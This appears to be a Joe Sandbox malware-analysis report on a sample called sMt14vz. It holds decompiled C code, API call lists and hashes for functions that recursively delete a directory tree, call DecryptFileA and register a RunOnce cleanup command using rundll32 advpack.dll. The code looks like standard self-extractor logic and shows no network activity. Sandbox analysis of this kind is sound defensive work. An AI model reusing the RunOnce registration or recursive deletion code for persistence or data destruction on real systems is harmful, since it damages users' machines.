                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d3063
                                                                                                                                                                                                                                            0x010d302b
                                                                                                                                                                                                                                            0x010d3032
                                                                                                                                                                                                                                            0x010d303c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d300e
                                                                                                                                                                                                                                            0x010d300e
                                                                                                                                                                                                                                            0x010d3015
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d3015
                                                                                                                                                                                                                                            0x010d3004
                                                                                                                                                                                                                                            0x010d2f80
                                                                                                                                                                                                                                            0x010d2f3f
                                                                                                                                                                                                                                            0x010d2f46
                                                                                                                                                                                                                                            0x010d2f5f
                                                                                                                                                                                                                                            0x010d2f5f
                                                                                                                                                                                                                                            0x010d2f64
                                                                                                                                                                                                                                            0x010d2f66
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d2f66
                                                                                                                                                                                                                                            0x010d2f4f
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d2f55
                                                                                                                                                                                                                                            0x010d2f5d
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetSystemDirectoryA.KERNEL32 ref: 010D2F93
                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 010D2FB2
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 010D2FC6
                                                                                                                                                                                                                                            • DecryptFileA.ADVAPI32 ref: 010D2FE6
                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 010D2FF8
                                                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNELBASE(010D91E4), ref: 010D301C
                                                                                                                                                                                                                                              • Part of subcall function 010D51E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,010D2F4D,?,00000002,00000000), ref: 010D5201
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
                                                                                                                                                                                                                                            • String ID: DecryptFileA$advapi32.dll
                                                                                                                                                                                                                                            • API String ID: 2126469477-2381948369
                                                                                                                                                                                                                                            • Opcode ID: 91289b71f9bb5fd24269c9eea198347ccd330ca9c8c55b162b403bf062b58e12
                                                                                                                                                                                                                                            • Instruction ID: ea1ae867a40cabce1fb9080f12161bd70bcd90704692a8f9692a425c921c2b30
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 91289b71f9bb5fd24269c9eea198347ccd330ca9c8c55b162b403bf062b58e12
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0641FA71A013168AEB71AB7D9C547A63BE8BB44754F0040A5FEC1CA145EB7AC580CB63
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            C-Code - Quality: 86%
                                                                                                                                                                                                                                            			E010D2390(CHAR* __ecx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v276;
                                                                                                                                                                                                                                            				char _v280;
                                                                                                                                                                                                                                            				char _v284;
                                                                                                                                                                                                                                            				struct _WIN32_FIND_DATAA _v596;
                                                                                                                                                                                                                                            				struct _WIN32_FIND_DATAA _v604;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t21;
                                                                                                                                                                                                                                            				int _t36;
                                                                                                                                                                                                                                            				void* _t46;
                                                                                                                                                                                                                                            				void* _t62;
                                                                                                                                                                                                                                            				void* _t63;
                                                                                                                                                                                                                                            				CHAR* _t65;
                                                                                                                                                                                                                                            				void* _t66;
                                                                                                                                                                                                                                            				signed int _t67;
                                                                                                                                                                                                                                            				signed int _t69;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t69 = (_t67 & 0xfffffff8) - 0x254;
                                                                                                                                                                                                                                            				_t21 =  *0x10d8004; // 0xc2f4ed82
                                                                                                                                                                                                                                            				_t22 = _t21 ^ _t69;
                                                                                                                                                                                                                                            				_v8 = _t21 ^ _t69;
                                                                                                                                                                                                                                            				_t65 = __ecx;
                                                                                                                                                                                                                                            				if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
                                                                                                                                                                                                                                            					L10:
                                                                                                                                                                                                                                            					_pop(_t62);
                                                                                                                                                                                                                                            					_pop(_t66);
                                                                                                                                                                                                                                            					_pop(_t46);
                                                                                                                                                                                                                                            					return E010D6CE0(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66);
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					E010D1680( &_v276, 0x104, __ecx);
                                                                                                                                                                                                                                            					_t58 = 0x104;
                                                                                                                                                                                                                                            					E010D16B3( &_v280, 0x104, "*");
                                                                                                                                                                                                                                            					_t22 = FindFirstFileA( &_v284,  &_v604); // executed
                                                                                                                                                                                                                                            					_t63 = _t22;
                                                                                                                                                                                                                                            					if(_t63 == 0xffffffff) {
                                                                                                                                                                                                                                            						goto L10;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						goto L3;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					do {
                                                                                                                                                                                                                                            						L3:
                                                                                                                                                                                                                                            						_t58 = 0x104;
                                                                                                                                                                                                                                            						E010D1680( &_v276, 0x104, _t65);
                                                                                                                                                                                                                                            						if((_v604.ftCreationTime & 0x00000010) == 0) {
                                                                                                                                                                                                                                            							_t58 = 0x104;
                                                                                                                                                                                                                                            							E010D16B3( &_v276, 0x104,  &(_v596.dwReserved1));
                                                                                                                                                                                                                                            							SetFileAttributesA( &_v280, 0x80);
                                                                                                                                                                                                                                            							DeleteFileA( &_v280);
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
                                                                                                                                                                                                                                            								E010D16B3( &_v276, 0x104,  &(_v596.cFileName));
                                                                                                                                                                                                                                            								_t58 = 0x104;
                                                                                                                                                                                                                                            								E010D658A( &_v280, 0x104, 0x10d1140);
                                                                                                                                                                                                                                            								E010D2390( &_v284);
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t36 = FindNextFileA(_t63,  &_v596); // executed
                                                                                                                                                                                                                                            					} while (_t36 != 0);
                                                                                                                                                                                                                                            					FindClose(_t63); // executed
                                                                                                                                                                                                                                            					_t22 = RemoveDirectoryA(_t65); // executed
                                                                                                                                                                                                                                            					goto L10;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}


                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • FindFirstFileA.KERNELBASE(?,010D8A3A,010D11F4,010D8A3A,00000000,?,?), ref: 010D23F6
                                                                                                                                                                                                                                            • lstrcmpA.KERNEL32(?,010D11F8), ref: 010D2427
                                                                                                                                                                                                                                            • lstrcmpA.KERNEL32(?,010D11FC), ref: 010D243B
                                                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(?,00000080,?), ref: 010D2495
                                                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 010D24A3
                                                                                                                                                                                                                                            • FindNextFileA.KERNELBASE(00000000,00000010), ref: 010D24AF
                                                                                                                                                                                                                                            • FindClose.KERNELBASE(00000000), ref: 010D24BE
                                                                                                                                                                                                                                            • RemoveDirectoryA.KERNELBASE(010D8A3A), ref: 010D24C5
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 836429354-0
                                                                                                                                                                                                                                            • Opcode ID: 68ee347738cc41d3da11f69a4aee2b671cc07626fb09fbd64ddb13d9a7b16e51
                                                                                                                                                                                                                                            • Instruction ID: ff7caeb8733792fbb63f93d0595c72f50002d6cbcd6a4c2d164eae63206117eb
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 68ee347738cc41d3da11f69a4aee2b671cc07626fb09fbd64ddb13d9a7b16e51
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9A319232605741ABD330DAB4CD88AEB77ECAFC4305F04492DB9D587180EF7895098752
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 70%
                                                                                                                                                                                                                                            			E010D2BFB(struct HINSTANCE__* _a4, intOrPtr _a12) {
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                                                                                            				long _t4;
                                                                                                                                                                                                                                            				void* _t6;
                                                                                                                                                                                                                                            				void* _t9;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t12;
                                                                                                                                                                                                                                            				intOrPtr* _t17;
                                                                                                                                                                                                                                            				intOrPtr* _t21;
                                                                                                                                                                                                                                            				void* _t22;
                                                                                                                                                                                                                                            				void* _t24;
                                                                                                                                                                                                                                            				intOrPtr _t32;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t4 = GetVersion();
                                                                                                                                                                                                                                            				if(_t4 >= 0 && _t4 >= 6) {
                                                                                                                                                                                                                                            					_t12 = GetModuleHandleW(L"Kernel32.dll");
                                                                                                                                                                                                                                            					if(_t12 != 0) {
                                                                                                                                                                                                                                            						_t21 = GetProcAddress(_t12, "HeapSetInformation");
                                                                                                                                                                                                                                            						if(_t21 != 0) {
                                                                                                                                                                                                                                            							_t17 = _t21;
                                                                                                                                                                                                                                            							 *0x10da288(0, 1, 0, 0);
                                                                                                                                                                                                                                            							 *_t21();
                                                                                                                                                                                                                                            							_t29 = _t24 - _t24;
                                                                                                                                                                                                                                            							if(_t24 != _t24) {
                                                                                                                                                                                                                                            								_t17 = 4;
                                                                                                                                                                                                                                            								asm("int 0x29");
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t20 = _a12;
                                                                                                                                                                                                                                            				_t18 = _a4;
                                                                                                                                                                                                                                            				 *0x10d9124 = 0;
                                                                                                                                                                                                                                            				if(E010D2CAA(_a4, _a12, _t29, _t17) != 0) {
                                                                                                                                                                                                                                            					_t9 = E010D2F1D(_t18, _t20); // executed
                                                                                                                                                                                                                                            					_t22 = _t9; // executed
                                                                                                                                                                                                                                            					E010D52B6(0, _t18, _t21, _t22); // executed
                                                                                                                                                                                                                                            					if(_t22 != 0) {
                                                                                                                                                                                                                                            						_t32 =  *0x10d8a3a; // 0x0
                                                                                                                                                                                                                                            						if(_t32 == 0) {
                                                                                                                                                                                                                                            							_t19 =  *0x10d9a2c;
                                                                                                                                                                                                                                            							if(( *0x10d9a2c & 0x00000001) != 0) {
                                                                                                                                                                                                                                            								E010D1F90(_t19, _t21, _t22);
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t6 =  *0x10d8588; // 0x0
                                                                                                                                                                                                                                            				if(_t6 != 0) {
                                                                                                                                                                                                                                            					CloseHandle(_t6);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return  *0x10d9124;
                                                                                                                                                                                                                                            			}

















                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetVersion.KERNEL32(?,00000002,00000000,?,010D6BB0,010D0000,00000000,00000002,0000000A), ref: 010D2C03
                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(Kernel32.dll,?,010D6BB0,010D0000,00000000,00000002,0000000A), ref: 010D2C18
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 010D2C28
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,010D6BB0,010D0000,00000000,00000002,0000000A), ref: 010D2C98
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Handle$AddressCloseModuleProcVersion
                                                                                                                                                                                                                                            • String ID: HeapSetInformation$Kernel32.dll
                                                                                                                                                                                                                                            • API String ID: 62482547-3460614246
                                                                                                                                                                                                                                            • Opcode ID: 778b361e5eabb992e38925143ce9c38470ea9369d8f18aafe70c9b69ad61d013
                                                                                                                                                                                                                                            • Instruction ID: 55c93763009cd4959a9789fbfad85669d53e7c3be164d9d516da10407b26cf7e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 778b361e5eabb992e38925143ce9c38470ea9369d8f18aafe70c9b69ad61d013
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A911E57130130A9BE7307BF9A888A6B3FA99B84394B041059FED0D3248DA3AEC418764
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E010D6F40() {
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				SetUnhandledExceptionFilter(E010D6EF0); // executed
                                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                                            			}



                                                                                                                                                                                                                                            0x010d6f45
                                                                                                                                                                                                                                            0x010d6f4d

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • SetUnhandledExceptionFilter.KERNELBASE(Function_00006EF0), ref: 010D6F45
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3192549508-0
                                                                                                                                                                                                                                            • Opcode ID: e78a5aeaeb1481db3ffe21c7ec0770ab5e5dc1995d7d6bfa028e495c7508023b
                                                                                                                                                                                                                                            • Instruction ID: d0d7e6586172d70d0494d79137eee9ddc826bc1724da360a78826841706d5256
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e78a5aeaeb1481db3ffe21c7ec0770ab5e5dc1995d7d6bfa028e495c7508023b
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0F900274352200D796201B71991941575915E4D6427815464E491C9448DB6640405611
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            C-Code - Quality: 93%
                                                                                                                                                                                                                                            			E010D202A(struct HINSTANCE__* __edx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				char _v528;
                                                                                                                                                                                                                                            				void* _v532;
                                                                                                                                                                                                                                            				int _v536;
                                                                                                                                                                                                                                            				int _v540;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t28;
                                                                                                                                                                                                                                            				long _t36;
                                                                                                                                                                                                                                            				long _t41;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t46;
                                                                                                                                                                                                                                            				intOrPtr _t49;
                                                                                                                                                                                                                                            				intOrPtr _t50;
                                                                                                                                                                                                                                            				CHAR* _t54;
                                                                                                                                                                                                                                            				void _t56;
                                                                                                                                                                                                                                            				signed int _t66;
                                                                                                                                                                                                                                            				intOrPtr* _t72;
                                                                                                                                                                                                                                            				void* _t73;
                                                                                                                                                                                                                                            				void* _t75;
                                                                                                                                                                                                                                            				void* _t80;
                                                                                                                                                                                                                                            				intOrPtr* _t81;
                                                                                                                                                                                                                                            				void* _t86;
                                                                                                                                                                                                                                            				void* _t87;
                                                                                                                                                                                                                                            				void* _t89;
                                                                                                                                                                                                                                            				void* _t90;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _t91;
                                                                                                                                                                                                                                            				signed int _t93;
                                                                                                                                                                                                                                            				void* _t94;
                                                                                                                                                                                                                                            				void* _t95;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t79 = __edx;
                                                                                                                                                                                                                                            				_t28 =  *0x10d8004; // 0xc2f4ed82
                                                                                                                                                                                                                                            				_v8 = _t28 ^ _t93;
                                                                                                                                                                                                                                            				_t84 = 0x104;
                                                                                                                                                                                                                                            				memset( &_v268, 0, 0x104);
                                                                                                                                                                                                                                            				memset( &_v528, 0, 0x104);
                                                                                                                                                                                                                                            				_t95 = _t94 + 0x18;
                                                                                                                                                                                                                                            				_t66 = 0;
                                                                                                                                                                                                                                            				_t36 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0, 0x2001f, 0,  &_v532,  &_v536); // executed
                                                                                                                                                                                                                                            				if(_t36 != 0) {
                                                                                                                                                                                                                                            					L24:
                                                                                                                                                                                                                                            					return E010D6CE0(_t36, _t66, _v8 ^ _t93, _t79, _t84, _t86);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_push(_t86);
                                                                                                                                                                                                                                            				_t87 = 0;
                                                                                                                                                                                                                                            				while(1) {
                                                                                                                                                                                                                                            					E010D171E("wextract_cleanup2", 0x50, "wextract_cleanup%d", _t87);
                                                                                                                                                                                                                                            					_t95 = _t95 + 0x10;
                                                                                                                                                                                                                                            					_t41 = RegQueryValueExA(_v532, "wextract_cleanup2", 0, 0, 0,  &_v540); // executed
                                                                                                                                                                                                                                            					if(_t41 != 0) {
                                                                                                                                                                                                                                            						break;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t87 = _t87 + 1;
                                                                                                                                                                                                                                            					if(_t87 < 0xc8) {
                                                                                                                                                                                                                                            						continue;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					break;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(_t87 != 0xc8) {
                                                                                                                                                                                                                                            					GetSystemDirectoryA( &_v528, _t84);
                                                                                                                                                                                                                                            					_t79 = _t84;
                                                                                                                                                                                                                                            					E010D658A( &_v528, _t84, "advpack.dll");
                                                                                                                                                                                                                                            					_t46 = LoadLibraryA( &_v528); // executed
                                                                                                                                                                                                                                            					_t84 = _t46;
                                                                                                                                                                                                                                            					if(_t84 == 0) {
                                                                                                                                                                                                                                            						L10:
                                                                                                                                                                                                                                            						if(GetModuleFileNameA( *0x10d9a3c,  &_v268, 0x104) == 0) {
                                                                                                                                                                                                                                            							L17:
                                                                                                                                                                                                                                            							_t36 = RegCloseKey(_v532);
                                                                                                                                                                                                                                            							L23:
                                                                                                                                                                                                                                            							_pop(_t86);
                                                                                                                                                                                                                                            							goto L24;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						L11:
                                                                                                                                                                                                                                            						_t72 =  &_v268;
                                                                                                                                                                                                                                            						_t80 = _t72 + 1;
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_t49 =  *_t72;
                                                                                                                                                                                                                                            							_t72 = _t72 + 1;
                                                                                                                                                                                                                                            						} while (_t49 != 0);
                                                                                                                                                                                                                                            						_t73 = _t72 - _t80;
                                                                                                                                                                                                                                            						_t81 = 0x10d91e4;
                                                                                                                                                                                                                                            						_t19 = _t81 + 1; // 0x10d91e5
                                                                                                                                                                                                                                            						_t89 = _t19;
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_t50 =  *_t81;
                                                                                                                                                                                                                                            							_t81 = _t81 + 1;
                                                                                                                                                                                                                                            						} while (_t50 != 0);
                                                                                                                                                                                                                                            						_t84 = _t73 + 0x50 + _t81 - _t89;
                                                                                                                                                                                                                                            						_t90 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - _t89);
                                                                                                                                                                                                                                            						if(_t90 != 0) {
                                                                                                                                                                                                                                            							 *0x10d8580 = _t66 ^ 0x00000001;
                                                                                                                                                                                                                                            							_t54 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";
                                                                                                                                                                                                                                            							if(_t66 == 0) {
                                                                                                                                                                                                                                            								_t54 = "%s /D:%s";
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_push(0x10d91e4);
                                                                                                                                                                                                                                            							E010D171E(_t90, _t84, _t54,  &_v268);
                                                                                                                                                                                                                                            							_t75 = _t90;
                                                                                                                                                                                                                                            							_t23 = _t75 + 1; // 0x1
                                                                                                                                                                                                                                            							_t79 = _t23;
                                                                                                                                                                                                                                            							do {
                                                                                                                                                                                                                                            								_t56 =  *_t75;
                                                                                                                                                                                                                                            								_t75 = _t75 + 1;
                                                                                                                                                                                                                                            							} while (_t56 != 0);
                                                                                                                                                                                                                                            							_t24 = _t75 - _t79 + 1; // 0x2
                                                                                                                                                                                                                                            							RegSetValueExA(_v532, "wextract_cleanup2", 0, 1, _t90, _t24); // executed
                                                                                                                                                                                                                                            							RegCloseKey(_v532); // executed
                                                                                                                                                                                                                                            							_t36 = LocalFree(_t90);
                                                                                                                                                                                                                                            							goto L23;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t79 = 0x4b5;
                                                                                                                                                                                                                                            						E010D44B9(0, 0x4b5, _t51, _t51, 0x10, _t51);
                                                                                                                                                                                                                                            						goto L17;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t91 = GetProcAddress(_t84, "DelNodeRunDLL32");
                                                                                                                                                                                                                                            					_t66 = 0 | _t91 != 0x00000000;
                                                                                                                                                                                                                                            					FreeLibrary(_t84); // executed
                                                                                                                                                                                                                                            					if(_t91 == 0) {
                                                                                                                                                                                                                                            						goto L10;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                                                            						E010D658A( &_v268, 0x104, 0x10d1140);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					goto L11;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t36 = RegCloseKey(_v532);
                                                                                                                                                                                                                                            				 *0x10d8530 = _t66;
                                                                                                                                                                                                                                            				goto L23;
                                                                                                                                                                                                                                            			}

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 010D2050
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 010D205F
                                                                                                                                                                                                                                            • RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 010D208C
                                                                                                                                                                                                                                              • Part of subcall function 010D171E: _vsnprintf.MSVCRT ref: 010D1750
                                                                                                                                                                                                                                            • RegQueryValueExA.KERNELBASE(?,wextract_cleanup2,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010D20C9
                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010D20EA
                                                                                                                                                                                                                                            • GetSystemDirectoryA.KERNEL32 ref: 010D2103
                                                                                                                                                                                                                                            • LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010D2122
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 010D2134
                                                                                                                                                                                                                                            • FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010D2144
                                                                                                                                                                                                                                            • GetSystemDirectoryA.KERNEL32 ref: 010D215B
                                                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010D218C
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010D21C1
                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010D21E4
                                                                                                                                                                                                                                            • RegSetValueExA.KERNELBASE(?,wextract_cleanup2,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 010D223D
                                                                                                                                                                                                                                            • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010D2249
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010D2250
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
